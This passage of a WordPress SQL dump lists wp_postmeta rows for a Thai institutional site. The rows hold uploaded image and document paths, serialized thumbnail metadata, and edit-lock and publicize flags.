(5118, 1469, '_wp_attached_file', '2018/03/5-3-2561-12-25-12.jpg'),
(5119, 1469, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/03/5-3-2561-12-25-12.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-25-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5122, 1473, '_wp_attached_file', '2018/03/5-3-2561-12-34-40.jpg'),
(5123, 1473, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:579;s:6:\"height\";i:155;s:4:\"file\";s:29:\"2018/03/5-3-2561-12-34-40.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-34-40-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"5-3-2561-12-34-40-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-34-40-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5128, 1478, '_wp_attached_file', '2018/03/5-3-2561-12-52-08.jpg'),
(5129, 1478, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:578;s:6:\"height\";i:160;s:4:\"file\";s:29:\"2018/03/5-3-2561-12-52-08.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-52-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"5-3-2561-12-52-08-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-52-08-400x111.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5134, 1483, '_wp_attached_file', '2018/03/5-3-2561-13-31-01.jpg'),
(5135, 1483, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:578;s:6:\"height\";i:157;s:4:\"file\";s:29:\"2018/03/5-3-2561-13-31-01.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-13-31-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"5-3-2561-13-31-01-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-13-31-01-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5146, 1493, '_wp_attached_file', '2018/03/5-3-2561-14-52-41.jpg'),
(5147, 1493, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:155;s:4:\"file\";s:29:\"2018/03/5-3-2561-14-52-41.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-14-52-41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"5-3-2561-14-52-41-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-14-52-41-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5152, 1496, '_wp_attached_file', '2018/03/5-3-2561-15-42-18.jpg'),
(5153, 1496, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:159;s:4:\"file\";s:29:\"2018/03/5-3-2561-15-42-18.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-15-42-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"5-3-2561-15-42-18-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-15-42-18-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5158, 1503, '_wp_attached_file', '2018/03/6-3-2561-9-34-49.jpg'),
(5159, 1503, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:577;s:6:\"height\";i:156;s:4:\"file\";s:28:\"2018/03/6-3-2561-9-34-49.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"6-3-2561-9-34-49-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"6-3-2561-9-34-49-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"6-3-2561-9-34-49-400x108.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5164, 1509, '_wp_attached_file', '2018/03/6-3-2561-14-30-24.jpg'),
(5165, 1509, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:808;s:6:\"height\";i:276;s:4:\"file\";s:29:\"2018/03/6-3-2561-14-30-24.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-3-2561-14-30-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"6-3-2561-14-30-24-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"6-3-2561-14-30-24-768x262.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"6-3-2561-14-30-24-400x137.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5166, 1512, '_edit_lock', '1607405083:14'),
(5167, 1512, '_edit_last', '14'),
(5168, 1512, '_publicize_pending', '1'),
(5169, 1512, '_hide_featured', NULL),
(5170, 1516, '_edit_lock', '1607421940:14'),
(5171, 1516, '_edit_last', '3'),
(5172, 1516, '_publicize_pending', '1'),
(5173, 1516, '_hide_featured', NULL),
(5176, 1522, '_wp_attached_file', '2018/03/คำสั่งแต่งตั้ง-ที่-2468-ปี-2560.pdf'),
(5177, 1523, '_edit_lock', '1520323717:3'),
(5178, 1523, '_edit_last', '3'),
(5179, 1523, '_publicize_pending', '1'),
(5180, 1523, '_hide_featured', NULL),
(5181, 1536, '_edit_lock', '1545639681:3'),
(5182, 1536, '_edit_last', '3'),
(5183, 1536, '_publicize_pending', '1'),
(5184, 1536, '_hide_featured', NULL),
(5185, 1541, '_edit_lock', '1545640994:3'),
(5186, 1541, '_edit_last', '3'),
(5187, 1541, '_publicize_pending', '1'),
(5188, 1541, '_hide_featured', NULL),
(5189, 1545, '_edit_lock', '1542358327:3'),
(5190, 1545, '_edit_last', '3'),
(5191, 1545, '_publicize_pending', '1'),
(5192, 1545, '_hide_featured', NULL),
(5201, 1554, '_wp_attached_file', '2018/02/เวร-เดือน-มีนาคม-2561.pdf'),
(5202, 1555, '_wp_attached_file', '2018/02/เวร-เดือน-มีนาคม-2561-1.pdf'),
(5212, 1563, '_wp_attached_file', '2018/03/ขั้นตอนการจัดทำSPEC.pdf'),
(5215, 1567, '_wp_attached_file', '2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc'),
(5216, 1569, '_wp_attached_file', '2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc'),
(5217, 1570, '_wp_attached_file', '2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc'),
(5224, 1572, '_edit_lock', '1542769049:3'),
(5225, 1572, '_edit_last', '3'),
(5226, 1572, '_publicize_pending', '1'),
(5227, 1572, '_hide_featured', NULL),
(5228, 1576, '_edit_lock', '1651215853:14'),
(5229, 1576, '_edit_last', '3'),
(5230, 1576, '_publicize_pending', '1'),
(5231, 1576, '_hide_featured', NULL),
(5232, 1582, '_edit_lock', '1520407148:3'),
(5233, 1582, '_edit_last', '3'),
(5234, 1582, '_publicize_pending', '1'),
(5235, 1582, '_hide_featured', NULL),
(5236, 1588, '_edit_lock', '1604458577:14'),
(5237, 1588, '_edit_last', '14'),
(5238, 1588, '_publicize_pending', '1'),
(5239, 1588, '_hide_featured', NULL),
(5240, 1590, '_wp_attached_file', '2018/03/5-3-2561-12-44-12.jpg'),
(5241, 1590, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:675;s:6:\"height\";i:311;s:4:\"file\";s:29:\"2018/03/5-3-2561-12-44-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-44-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-44-12-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-12-44-12-400x184.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5242, 1592, '_wp_attached_file', '2018/03/5-3-2561-13-22-38.jpg'),
(5243, 1592, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:455;s:6:\"height\";i:323;s:4:\"file\";s:29:\"2018/03/5-3-2561-13-22-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-13-22-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-3-2561-13-22-38-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-13-22-38-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5246, 1597, '_wp_attached_file', '2018/03/7-3-2561-13-01-48.jpg'),
(5247, 1597, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:731;s:6:\"height\";i:315;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-01-48.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-01-48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-01-48-300x129.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-01-48-400x172.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5248, 1600, '_wp_attached_file', '2018/03/7-3-2561-13-06-42.jpg'),
(5249, 1600, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:196;s:6:\"height\";i:244;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-06-42.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-06-42-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5250, 1603, '_wp_attached_file', '2018/03/7-3-2561-13-11-03.jpg'),
(5251, 1603, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-11-03.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-11-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5252, 1606, '_wp_attached_file', '2018/03/7-3-2561-13-18-28.jpg'),
(5253, 1606, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:197;s:6:\"height\";i:242;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-18-28.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-18-28-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5254, 1607, '_wp_attached_file', '2018/03/7-3-2561-13-23-48.jpg'),
(5255, 1607, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:729;s:6:\"height\";i:625;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-23-48.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-23-48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-23-48-300x257.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:257;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-23-48-350x300.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5256, 1610, '_wp_attached_file', '2018/03/แบบฟอร์ม-สผ.แผนก-.doc'),
(5258, 1612, '_wp_attached_file', '2018/03/แบบฟอร์ม-สผ.งาน-.doc'),
(5259, 1614, '_wp_attached_file', '2018/03/7-3-2561-13-37-08.jpg'),
(5260, 1614, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:238;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-37-08.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-37-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5261, 1615, '_wp_attached_file', '2018/03/7-3-2561-13-35-56.jpg'),
(5262, 1615, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:495;s:6:\"height\";i:326;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-35-56.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-35-56-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-35-56-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-35-56-400x263.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5263, 1619, '_wp_attached_file', '2018/03/7-3-2561-13-46-48.jpg'),
(5264, 1619, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:238;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-46-48.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-46-48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5265, 1620, '_wp_attached_file', '2018/03/7-3-2561-13-50-20.jpg'),
(5266, 1620, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:743;s:6:\"height\";i:630;s:4:\"file\";s:29:\"2018/03/7-3-2561-13-50-20.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-50-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-50-20-300x254.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:254;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-50-20-354x300.jpg\";s:5:\"width\";i:354;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5267, 1623, '_wp_attached_file', '2018/03/7-3-2561-14-12-02.jpg'),
(5268, 1623, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:241;s:4:\"file\";s:29:\"2018/03/7-3-2561-14-12-02.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-14-12-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5269, 1626, '_wp_attached_file', '2018/03/7-3-2561-14-17-46.jpg'),
